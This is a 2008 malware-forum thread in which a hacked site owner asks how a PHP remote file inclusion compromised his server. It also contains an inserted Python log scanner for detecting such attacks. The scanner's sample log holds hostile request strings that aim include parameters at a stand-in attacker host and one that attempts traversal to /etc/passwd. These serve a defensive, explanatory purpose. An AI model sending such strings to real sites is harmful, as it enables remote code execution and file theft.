Malware Domain List

Malware Related => Compromised Servers => Topic started by: GHands on June 11, 2008, 10:52:07 pm

Title: My site is on your list, i need some help with the mess i found.
Post by: GHands on June 11, 2008, 10:52:07 pm
Hi,

My server got hacked towards the end of May; they left a file behind, along with some programs that they were piggybacking on my server.

My host originally switched it off and suspended it, as the server tried spamming; they had set up a spoof email account, an IRC channel, SourceGuardian and ionCube.

I have a lot of .txt files that I cannot make sense of; could I post them here for comments? I think they are relaying or something, as my site is linked to a named .txt file in a lot of people's logs.

Apart from being confused about how they hacked my site (across multiple domains) and spending the best part of a week cleaning the server, I would like to learn from this.

Any help appreciated.

http://www.malwaredomainlist.com/mdl.php?search=fdmclan.net

Title: Re: My site is on your list, i need some help with the mess i found.
Post by: sowhat-x on June 12, 2008, 03:55:18 am
Quote
I have a lot of .txt files that I cannot make sense of; could I post them here for comments?

Sure you can, an important note though... since the forums here are in public view,
you most probably don't want to disclose that many details,
as you never know who might be reading the forums...

Not a PHP guru myself, but what I see in the list
is that a remote file inclusion took place (arab.txt is a widely used/spread malware script).
Meaning that, apart from obviously patching the web server software to the latest version etc.,
you should also audit the PHP code for mistakes, so that such an incident does not happen again.
There are a few guys around who are way more experienced in that area
and can give you way more detailed explanations/instructions...
hopefully they're willing to give more help than I can.  :)

Title: Re: My site is on your list, i need some help with the mess i found.
Post by: sowhat-x on June 12, 2008, 06:44:50 am
Quote
Apart from being confused about how they hacked my site (across multiple domains)...
...If by that you mean what an RFI is/how it works,
googling for "php remote file inclusion tutorial" will give you all the answers you need...

One more thing, forgot mentioning it previously...
since the site has been 'cleaned' up now, it will obviously be removed from the list.
If possible though, do consider submitting any malware executables/scripts that you found
at services like UploadMalware.com, VirusTotal etc...

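The two replies above point at the mechanism (a PHP remote file inclusion pulling a script such as arab.txt from another server) and at the two places it shows up: the victim's access log, where a query parameter carries a remote URL, and the hosting server's access log, where many unrelated hosts fetch the same .txt file. The following scanner is an added example written for this thread, not code from any of the posters. The log lines in SAMPLE_LOG are constructed; the attacker address 203.0.113.9, the script names index.php and forum/index.php, and the parameter names page and inc are assumptions chosen to mirror what the thread describes.

```python
"""Spot PHP remote-file-inclusion (RFI) traffic in a web server access log.

Added example for this thread, not code from the original posts. SAMPLE_LOG is
constructed; the addresses, script names and payload name are assumptions.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx "combined" format:
# ip ident user [time] "METHOD target HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Schemes that PHP include()/require() will open when allow_url_include=On.
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps", "data", "php"}


@dataclass
class RfiHit:
    ip: str        # client that sent the request
    time: str      # log timestamp, as written
    script: str    # local script whose parameter was abused
    param: str     # the abused parameter name, e.g. page or inc
    remote: str    # the remote resource the parameter pointed at
    status: int    # 200 here usually means the include went through


def remote_ref(value: str) -> Optional[str]:
    """Return value if it is a URL PHP could include() remotely, else None.

    The trailing '?' seen in real attacks (.../arab.txt?) is deliberate: any
    suffix the vulnerable script appends (e.g. ".php") becomes a query string
    on the attacker's server, so the include still resolves.
    """
    value = value.strip()
    parts = urlsplit(value)
    scheme = parts.scheme.lower()
    if scheme not in REMOTE_SCHEMES:
        return None
    # http/ftp need a host part; data: and php:// wrappers do not carry one.
    if scheme in {"data", "php"} or parts.netloc:
        return value
    return None


def scan_log(lines: Iterable[str]) -> List[RfiHit]:
    """Flag requests in which any query parameter carries a remote URL."""
    hits: List[RfiHit] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        target = urlsplit(m["target"])
        # parse_qsl percent-decodes, so an encoded http%3A%2F%2F is caught too.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            remote = remote_ref(value)
            if remote is not None:
                hits.append(RfiHit(m["ip"], m["time"], target.path, name,
                                   remote, int(m["status"])))
    return hits


def payload_fetches(lines: Iterable[str], suffix: str = ".txt") -> Dict[str, int]:
    """Count distinct client IPs that fetched each *.txt on this server.

    When the compromised server is the one hosting the script, its own log
    shows the other side of the RFI: many unrelated hosts (other victims'
    web servers executing include()) requesting the same .txt file.
    """
    clients: Dict[str, set] = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = urlsplit(m["target"]).path
        if path.lower().endswith(suffix):
            clients.setdefault(path, set()).add(m["ip"])
    return {path: len(ips) for path, ips in clients.items()}


# Constructed sample: two RFI attempts, a benign request, a traversal attempt
# (not RFI, so not flagged by scan_log), and three fetches of a hosted payload.
SAMPLE_LOG = """\
203.0.113.7 - - [28/May/2008:03:14:07 +0100] "GET /index.php?page=http://203.0.113.9/arab.txt? HTTP/1.1" 200 5123 "-" "libwww-perl/5.805"
203.0.113.7 - - [28/May/2008:03:14:09 +0100] "GET /forum/index.php?inc=http%3A%2F%2F203.0.113.9%2Farab.txt%3F HTTP/1.1" 200 5123 "-" "libwww-perl/5.805"
198.51.100.4 - - [28/May/2008:08:02:11 +0100] "GET /index.php?page=about HTTP/1.1" 200 2210 "http://www.example.net/" "Mozilla/5.0"
203.0.113.7 - - [28/May/2008:03:15:00 +0100] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 5123 "-" "libwww-perl/5.805"
192.0.2.10 - - [29/May/2008:11:40:01 +0100] "GET /arab.txt HTTP/1.0" 200 31200 "-" "PHP/5.2.5"
192.0.2.11 - - [29/May/2008:11:41:37 +0100] "GET /arab.txt HTTP/1.0" 200 31200 "-" "PHP/5.2.6"
198.51.100.77 - - [29/May/2008:11:45:12 +0100] "GET /arab.txt HTTP/1.0" 200 31200 "-" "PHP/5.1.6"
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print(f"RFI attempt: {hit.ip} -> {hit.script} ?{hit.param}= {hit.remote} ({hit.status})")
    for path, n in payload_fetches(SAMPLE_LOG.splitlines()).items():
        print(f"payload {path} fetched by {n} distinct hosts")
```

Run it over the real log with `scan_log(open("access_log"))`; a hit whose status is 200 is the request to investigate first, and the script and parameter it names are where to look in the PHP source for an `include`/`require` fed by `$_GET` or `$_REQUEST`. The `payload_fetches` side is what the original poster was seeing from the other direction: the .txt file on his server being pulled by many strangers' web servers. The fix the second reply asks for is the code audit; the configuration half of it is setting `allow_url_include = Off` in php.ini (and `allow_url_fopen = Off` where the site does not need it), which turns every hit in the first list into a failed include instead of remote code execution.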
Title: Re: My site is on your list, i need some help with the mess i found.
Post by: Orac on June 12, 2008, 12:29:03 pm
Hi GHands

Just seen your post.

I am an admin on a server support forum; if you're interested, you're welcome to join the forum and we will help you clean your server.

The forum is closed to the public, and we would open a room for you that can only be accessed by yourself, and our server support staff.

If you wish to proceed, please send me a PM here, together with the username that you intend to use (we keep the forum locked down from prying eyes, so I will need to know the name you would be registering with).